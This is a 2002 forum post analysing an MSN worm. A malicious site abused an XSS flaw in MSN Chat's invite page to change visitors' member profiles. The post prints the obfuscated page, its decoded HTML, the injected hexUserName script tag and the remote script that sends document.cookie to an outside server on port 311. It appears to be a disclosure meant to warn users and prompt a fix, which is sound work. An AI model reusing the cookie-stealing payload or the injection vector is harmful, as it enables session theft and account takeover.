MSN Chat, it changes your profile... unasked

FreeUS · #1 11th Oct 02, 03:52 AM

Malicous porn sites, use a javascript to changes your profile. Its an all exclusive 'MSN Member' worm.

First impression
I didnt believe this. Your profile is changed just by visiting a site? But (again) appearantly this is very true. If you (by accident) view a profile today (or one of the following days, that leads to a site like http://honeyhome.hotpage.net/.. you'll be sorry later

How it works:
Lets say that the user with the email doesnt-excist@hotmail.com is infected. We are visiting his profile on a url like this 'http://members.msn.com/doesnt-excist@hotmail.com'.
The profile is filled in with some random info... nothing special. Nothing interesting. Oh there is a link to his homepage.

The badass site is http://honeyhome.hotpage.net/. It will attempt to change your profile
(some parts of the code are altered for security reasons)
Lets take a look at the source of that site:

Quote:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN"><HTML><HEAD><TITLE>Untitled Document</TITLE><script language=JScript.Encode>#@~^AgQAAA==@#@&\CMP:+6DP{ E]
2Z4YsVYfA]!GY!z]&;4nl9]22Y!9YZbY&;OkDVnY22jUObYs+9Yy!9Km!:+
YufZJYrY^+YfA]!GY!z]&;hnYm]y!4YO2 +5Eb-]2fY+yZWUO?xOO:za+
Yy u !1WO+YY&G]++D+6D&tD:Vuf$]y!1tCDdnD]ffbdW %0XOOFY+y]

f2uTG]Tz]2Zz4+m[]22Y!G]T)u!fuTbu&Z6.C:?/?YY T.Khd]29]y 11O,,Y
+;FY yYy!WMls+4KD9nDu&9]y H6u *u+!(WD9n.]2fu +!Y+y]+!6.ls+d2

mmkULu&9]y+Z]+y]y!mKVkY&G]+ C]++u&2u+!u!fuT)]y!u T]+Tu T]yT]
y!Yf;0DCh?]+!Cs+Y2fu *slbUsMlh+u +Yy!/M^]2f]y+hXalT+ tOhu
+]23]ZfYTz]!9YZbY ZYy!Yy!u !u ZY Z]fZ6DCh?] ZUls+]29Y y4KYOW
hoMlh+yY y]+TkmDGs^kUoufG]+y1}] y]yTxKDn/bynYy!/M^]2f]y+4YDw
u&)z&^4lORsdxcmGhJkx-rD+ :kUS]fwt?6xbm0Y&Gb)bzbY++qx7rYmYkKU/

W9+u&9F+fW*?GR1]yvhG9+]f9y]+v4nXjd?Dgl:?]29]y*fZkm.raY]yX Z/D
1Y+*2f4YOwY+l&)zJ+FFRq1lR&{ 2c&Y?dDR%kwu *22u+*2AY l&/Yy**1Y
l sk^.kaYu X&3Yy Y&AY!G]T)u !Y+Z]+!u+Z]f;z6Dls+knYu&3]ZfYTz]!

GY!z]!GYTbu&;xG0.Cs+d]23]2Z8G9X]+T(o^W^GM]fG]y ]y&woswso]y Yf
A]!GY!z]!GYTbu&;z8W[zu&3]2/zWW.m:+dY22Y!GYZbY2ZJtYsVuf2u!9

]ZbEI@#@&@#@&WEmYbGUPG+;W[+cb,~\m.Pg+AP?6YI~g+AK?aDPx,E
+/1lan`:+aY*i~[KmEsnxDRhMrO+v1?hP+aO*iNPGnZKNnc*i@#@&bx4B
AA==^#~@</SCRIPT>
<META http-equiv=Content-Type
*content="text/html; charset=windows-1252"></HEAD>
*<body bgcolor="red">
*<iFRAME name=mainFrame src="mypage.htm">

<iFRAME name=bottomFrame2
*src="http://chat.msn.com/invite.msnw?hexnick=AAAAA&
InvitationCode=123456789&mode=2&hexUserNam e=%3Csc

ript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%
2Fscript%3E"
*noResize scrolling=no>
*</body>
*</HTML>

They encoded the script. Thank god for decoders. The decoded the output to this:

Quote:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Frameset//EN"><HTML><HEAD><TITLE>Untitled Document</TITLE>

<script language=JScript.Encode>var Text ="
%3Chtml%3E%0D%0A%3Chead
%3E%0D%0A%3Ctitle%3EUntitled%20Document%3C/title
%3E%0D%0A%3Cmeta%20http-equiv%3D%2

2Content-Type%22%20content%3
D%22text/html%3B%20charset%3Di
so-8859-1%22%3E%0D%0A%3C
/head%3E%0D%0A%0D%0A%3C
frameset%20rows%3D%2299999
%2C1%22%20frameborder%3D
%22NO%22%20border%3D%220%2
2%20framespacing%3D%220%22%

20cols%3D%22*%22%3E%20%0D
%0A%20%20%20%20%20%20%3
Cframe%20name%3D%22mainFrame
%22%20src%3D%22mypage.htm
%22%3E%0D%0A%0D%0A%20%20
%20%20%20%20%3C

frame%20name%3D%22bottomFrame
2%22%20scrolling%3D%22NO%22%20
noresize%20src%3D%22http%3A
//chat.msn.com/invite.msnw%3Fh
exnick%3DAAAAA%26InvitationCode
%3D123456789%26mode%3D2%26h

exUserName%3D%253Cscript%2520
src%253Dhttp%253A//217.195.37
.34/test.jsp%253E%253B%253C%
255c%252Fscript%253E%22%3E%0D%
0A%20%20%20%20%3C/frameset%
3E%0D%0A%0D%0A%0D%0A%

3Cnoframes%3E%3Cbody%20bgcolor
%3D%22%23FFFFFF%22%3E%0D
%0A%0D%0A%3C/body%3E%3C
/noframes%3E%0D%0A%3C/html%3E%0D%0A";

function DeCode() { var NewText; NewText = unescape(Text);

document.write(NewText);} DeCode();
</SCRIPT>
<META http-equiv=Content-Type
content="text/html; charset=windows-1252"></HEAD>
<body bgcolor="red">

<iFRAME name=mainFrame src="mypage.htm">

<iFRAME name=bottomFrame2
src="http://chat.msn.com/invite.msnw?hexnick=AAAAA&

InvitationCode=123456789&mode=2&hexUserNam

e=%3Cscript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3
E%3B%3C%5c%2Fscript%3E"
noResize scrolling=no>
</body>
</HTML>

So the function they are trying hide is something like this:

Quote:

If we put the same code withouth the dirty % comes out as:

Quote:

<html><head><title>Untitled Document</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<frameset rows="99999,1" frameborder="NO" border="0" framespacing="0" cols="*">
<frame name="mainFrame" src="mypage.htm">
<frame name="bottomFrame2" scrolling="NO"

noresize src="http://chat.msn.com/invite.msnw?hexnick=AAAAA

&InvitationCode=123456789&mode=2&hexUserName=%3 Csc

ript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%

2Fscript%3E">
</frameset>
<noframes><body bgcolor="#FFFFFF">
</body></noframes>
</html>

I know that you saw it. That src of the url seems to strange.

Quote:

http://chat.msn.com/invite.msnw?hexn...tionCode=12345

6789&mode=2&hexUserName=%3Cscript%20src%3Dhttp%3A//217.19

5.37.34/test.jsp%3E%3B%3C%5c%2Fscript%3E

It steals your MSN cookies

Quote:

http://chat.msn.com/invite.msnw
hexnick=AAAAA
InvitationCode=123456789
mode=2
hexUserName=%3Cscript%20src%3Dhttp%3A//217.195.37.34/test.jsp%3E%3B%3C%5c%2Fscript%3E

So here it is the variable 'hexUserName' that is causing the pain.

Decoded its:

Quote:

<script>http://217.195.37.34/test.jsp</script>

Lets take a look at the contents of that file.

Quote:

function packen(quasi) {
var test;
test = '';
for(var i = 0; i <= quasi.length - 1; i++)
test = test + quasi.charCodeAt(i) + ',';
return(test);
}
location.href="http://217.195.37.34:311/test.php?cod=" + packen(document.cookie);

This script takes a string as parameter and then char by char puts it into ascii code. Seperated with a comma.

The string it takes are your cookies, and it sends them in a number format to a php script on port 311 of that same server.

I captured the output of the script. (I changed most of the numbers, so that you guys dont steal my account

so dont even bother...)

Quote:

http://217.195.37.34:311/test.php?co...,85,73,68,6 1,
68,67,56,66,69,54,56,55,48,56,48,65,
52,51,52,66,57,65,50,55,53,55,53,68,67
,70,69,56,57,49,54,67,59,32,83,73,84,69
,83,69,82,86,69,82,61,73,68,6

1,85,74,66,62,63,64,54,66,49,54,56,54,
47,57,49,65,52,51,52,63,52,66,52,56,55
56,54,68,67,70,69,58,57,49,54,67,59,34,
108,97,120,103,63,110,104,45,98,121,59,
33,108,124,61,77,83,70,84

The PHP script on the 311 port gets the cookies via Ascii
At first sight i saw this was ascii code... If we decode this, as the javascript coded it. We get the following: (again, i altered the things, so dont bother...)

Quote:

MC1=V=2&GUID=DC8434B9BE68080AA27598775DCFE16C; SITESERVER=ID=UID=DC9A275E68B434DCFE8B87080A75916C ;
= ;

It is obvious and clear that with these combined values. One can change a MSN Member Profile. Possibly you can change more things. But lets not hope for the worst.

Aftermath
It seems the sever at this port (311) went down on 8-10-2002 9:45:08 GMT.. It looks at it is hosted by Tiscali Germany. I will contact them shortly.

This worm clearly shows 2 things.
1. Porn sites and more are going ver low to get that few extra hits.
2. Everything without previous reported exploits or flaws made by Microsoft, should be considered unsafe or untested...

Microsoft fix these:
In http://chat.msn.com/invite.msnw the value hexUserName should not contain %'es.

This 'hack' was reported by Reported by GroundZero and rachel. I found it interesting to investigate it further. Thank you for bringing my attention to it.

UnderDOC underdoc@msnfanatic.com

Last edited by Sephiroth at Oct 10 2002, 10:39 PM